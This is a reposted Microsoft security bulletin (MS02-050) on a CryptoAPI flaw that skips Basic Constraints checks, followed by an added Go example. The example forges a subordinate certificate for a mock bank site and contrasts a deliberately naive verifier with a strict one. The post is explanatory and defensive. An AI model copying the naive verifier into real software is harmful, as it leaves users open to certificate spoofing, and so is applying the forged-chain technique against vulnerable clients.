[MS02-050] Certificate Validation Flaw


Certificate Validation Flaw Could Enable Identity Spoofing (Q328145)

Originally posted: September 04, 2002

Updated: September 09, 2002

Summary

Who should read this bulletin: Customers using Microsoft® Windows®, Office for Mac, Internet Explorer for Mac, or Outlook Express for Mac.

Impact of vulnerability: Identity spoofing.

Maximum Severity Rating: Critical

Recommendation: Administrators should install the patch immediately.

Affected Software:

Microsoft Windows 98

Microsoft Windows 98 Second Edition

Microsoft Windows Me

Microsoft Windows NT® 4.0

Microsoft Windows NT 4.0, Terminal Server Edition

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Office for Mac

Microsoft Internet Explorer for Mac

Microsoft Outlook Express for Mac

Technical description:

This patch eliminates a security vulnerability associated with the validation of digital certificate chains. Before installing it, customers should review the Caveats section of this bulletin, which discusses a known side effect of installing the patch. Updated patches are under development to eliminate this side effect.

The IETF Profile of the X.509 certificate standard defines several optional fields (extensions) that can be included in a digital certificate. One of these is the Basic Constraints field, which indicates whether the certificate belongs to a Certificate Authority or to an end entity and, for a CA, the maximum allowable length of the certificate chain beneath it. However, the APIs within CryptoAPI that construct and validate certificate chains (CertGetCertificateChain(), CertVerifyCertificateChainPolicy(), and WinVerifyTrust()) do not check the Basic Constraints field: they verify that each certificate's signature chains up to a trusted root, but never ask whether the signing certificate was permitted to act as a CA at all. The same flaw, unrelated to CryptoAPI, is also present in several Microsoft products for Macintosh.

The vulnerability could enable an attacker who had a valid end-entity certificate to issue a subordinate certificate that, although bogus, would nevertheless pass validation. Because CryptoAPI is used by a wide range of applications, this could enable a variety of identity spoofing attacks. These are discussed in detail in the FAQ, but could include:

Setting up a web site that poses as a different web site, and "proving" its identity by establishing an SSL session as the legitimate web site.

Sending emails signed using a digital certificate that purportedly belongs to a different user.

Spoofing certificate-based authentication systems to gain entry as a highly privileged user.

Digitally signing malware using an Authenticode certificate that claims to have been issued to a company users might trust.
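The flaw described above is easiest to see by building the offending chain and running it through two verifiers. The following is an added example written for this post, not code from the bulletin or from Microsoft; it uses Go's standard crypto/x509 package. It constructs a root CA, a legitimate end-entity certificate with Basic Constraints cA=FALSE, and a bogus "subordinate" certificate signed with the end-entity's private key (the subject names and serials are made up). NaiveVerify models the unpatched behaviour: it walks the chain checking signatures only and never consults Basic Constraints, so the bogus certificate passes. StrictVerify uses x509.Verify, which enforces Basic Constraints and rejects it, while still accepting the legitimate end-entity certificate on its own.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Chain holds the constructed certificates: a trusted root, a legitimate
// end-entity certificate it issued (cA=FALSE), and a bogus "subordinate"
// certificate signed with the end-entity's private key.
type Chain struct {
	Root, EndEntity, Bogus *x509.Certificate
}

// newTemplate builds a minimal template. Basic Constraints is always encoded,
// so the cA bit is explicit: TRUE for the root, FALSE for everything else.
// Names and serials are constructed for this example.
func newTemplate(cn string, serial int64, isCA bool) *x509.Certificate {
	t := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
		KeyUsage:              x509.KeyUsageDigitalSignature,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	if isCA {
		t.KeyUsage |= x509.KeyUsageCertSign
	}
	return t
}

// issue signs tmpl with parentKey, naming parent as issuer, and parses the result.
func issue(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, parentKey *ecdsa.PrivateKey) (*x509.Certificate, error) {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, parentKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// BuildChain constructs root -> end-entity -> bogus. Nothing stops a key
// holder from producing the bogus certificate; only the verifier can reject it.
func BuildChain() (*Chain, error) {
	var keys [3]*ecdsa.PrivateKey
	for i := range keys {
		k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
		if err != nil {
			return nil, err
		}
		keys[i] = k
	}
	rootKey, eeKey, bogusKey := keys[0], keys[1], keys[2]

	rootTmpl := newTemplate("Constructed Root CA", 1, true)
	root, err := issue(rootTmpl, rootTmpl, &rootKey.PublicKey, rootKey) // self-signed
	if err != nil {
		return nil, err
	}
	ee, err := issue(newTemplate("legit.example", 2, false), root, &eeKey.PublicKey, rootKey)
	if err != nil {
		return nil, err
	}
	// The attacker holds eeKey and "issues" a certificate for a victim site.
	bogus, err := issue(newTemplate("www.victim-bank.example", 3, false), ee, &bogusKey.PublicKey, eeKey)
	if err != nil {
		return nil, err
	}
	return &Chain{Root: root, EndEntity: ee, Bogus: bogus}, nil
}

// NaiveVerify models the unpatched CryptoAPI behaviour: each certificate's
// signature is checked under the next certificate's public key, ending at the
// trusted root, and Basic Constraints is never consulted. chain[0] is the leaf.
func NaiveVerify(chain []*x509.Certificate, root *x509.Certificate) error {
	for i, cert := range chain {
		parent := root
		if i+1 < len(chain) {
			parent = chain[i+1]
		}
		// CheckSignature verifies raw bytes only; CheckSignatureFrom would already enforce cA.
		if err := parent.CheckSignature(cert.SignatureAlgorithm, cert.RawTBSCertificate, cert.Signature); err != nil {
			return fmt.Errorf("%q: %w", cert.Subject.CommonName, err)
		}
	}
	return nil
}

// StrictVerify uses x509.Verify, which rejects any intermediate whose Basic
// Constraints does not assert cA=TRUE (RFC 5280 section 4.2.1.9).
func StrictVerify(leaf *x509.Certificate, intermediates []*x509.Certificate, root *x509.Certificate) error {
	roots, inters := x509.NewCertPool(), x509.NewCertPool()
	roots.AddCert(root)
	for _, c := range intermediates {
		inters.AddCert(c)
	}
	_, err := leaf.Verify(x509.VerifyOptions{Roots: roots, Intermediates: inters,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageAny}})
	return err
}

func main() {
	ch, err := BuildChain()
	if err != nil {
		panic(err)
	}
	fmt.Println("naive (signatures only):  ", NaiveVerify([]*x509.Certificate{ch.Bogus, ch.EndEntity}, ch.Root))
	fmt.Println("strict (basic constraints):", StrictVerify(ch.Bogus, []*x509.Certificate{ch.EndEntity}, ch.Root))
}
```

When run, the naive verifier returns nil for the bogus chain, which is exactly what let an end-entity certificate holder spoof any SSL site, signer or Authenticode publisher against the unpatched CryptoAPI; the strict verifier returns an error because the end-entity certificate is not authorized to sign other certificates. The practical check for a client library is therefore not "does the chain reach a trusted root" but "is every certificate above the leaf a CA, and is the path length within each CA's limit".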

http://www.microsoft.com/technet/treeview/...in/MS02-050.asp
